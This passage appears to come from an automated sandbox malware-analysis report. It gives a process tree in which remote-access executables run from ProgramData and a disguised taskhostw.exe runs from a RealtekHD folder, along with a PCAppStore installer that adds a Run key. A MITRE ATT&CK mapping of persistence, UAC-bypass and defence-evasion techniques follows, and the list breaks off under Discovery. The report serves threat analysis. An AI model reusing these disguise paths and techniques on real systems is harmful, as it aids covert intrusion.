"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
5⤵
PID:5552

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 /prefetch:8
5⤵
PID:5100

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 /prefetch:8
5⤵
PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
5⤵
PID:4352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
5⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
5⤵
PID:5316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
5⤵
PID:448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
5⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4840 /prefetch:8
5⤵
PID:5476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3716 /prefetch:8
5⤵
- Modifies registry class
PID:2956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3492 /prefetch:8
5⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
5⤵
PID:5916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6536 /prefetch:8
5⤵
PID:5132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
5⤵
PID:4792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
5⤵
PID:4192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
5⤵
PID:5264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
5⤵
PID:4960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
5⤵
PID:3744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
5⤵
PID:4184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
5⤵
PID:3972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
5⤵
PID:2460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1332 /prefetch:8
5⤵
PID:2620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
5⤵
PID:1668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
5⤵
PID:4792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 /prefetch:2
5⤵
PID:5256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
5⤵
PID:5424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=5664,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4684 /prefetch:1
2⤵
PID:5176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=5796,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5176 /prefetch:1
2⤵
PID:3212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=5932,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3020 /prefetch:1
2⤵
PID:5148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=5364,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5972 /prefetch:1
2⤵
PID:3952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5988,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5040 /prefetch:8
2⤵
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4956,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5504 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5680,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6272 /prefetch:8
2⤵
PID:5064

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3092

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2872

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1652

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:220

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4600

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
2⤵
- Executes dropped EXE
PID:4344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:5364

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5208

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1960

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6056

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5592

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5408

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5796

C:\Users\Admin\Downloads\Setup.exe
"C:\Users\Admin\Downloads\Setup.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pcapp.store/installing.php?guid=6F95B8B4-C02B-43C9-8CD4-016780936B63X&winver=19041&version=fa.1091v&nocache=20240901212541.811&_fcid=1725225821489388
2⤵
PID:3664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x120,0x124,0xbc,0x128,0x7fffd3f446f8,0x7fffd3f44708,0x7fffd3f44718
3⤵
PID:3004

C:\Users\Admin\AppData\Local\Temp\nse46E6.tmp
"C:\Users\Admin\AppData\Local\Temp\nse46E6.tmp" /internal 1725225821489388 /force
2⤵
- Loads dropped DLL
- Adds Run key to start application
PID:3724

C:\Users\Admin\PCAppStore\PcAppStore.exe
"C:\Users\Admin\PCAppStore\PcAppStore.exe" /init default
3⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4724

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
.\nwjs\NW_store.exe .\ui\.
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1876

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
C:\Users\Admin\PCAppStore\nwjs\NW_store.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\pc_app_store\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" --annotation=plat=Win64 --annotation=prod=pc_app_store --annotation=ver=0.1.0 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7fffd38fa960,0x7fffd38fa970,0x7fffd38fa980
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3404

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2172 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:2
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5488

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --mojo-platform-channel-handle=2180 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:3
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5484

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=2228 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:8
5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4600

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --nwjs --extension-process --no-appcompat-clear --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\PCAppStore\nwjs\gen" --no-zygote --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:2
5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:2928

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6388

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4988 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4764

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4940 --field-trial-handle=2176,i,4586187498567612950,3955430929926614351,262144 --variations-seed-version /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5416

C:\Users\Admin\PCAppStore\download\SetupEngine.exe
"C:\Users\Admin\PCAppStore\download\SetupEngine.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2732

C:\Users\Admin\PCAppStore\Watchdog.exe
"C:\Users\Admin\PCAppStore\Watchdog.exe" /guid=6F95B8B4-C02B-43C9-8CD4-016780936B63X /rid=20240901212608.543240954796 /ver=fa.1091v
3⤵
- Executes dropped EXE
PID:5876

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3776

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
PID:380

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3584

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

System Information Discovery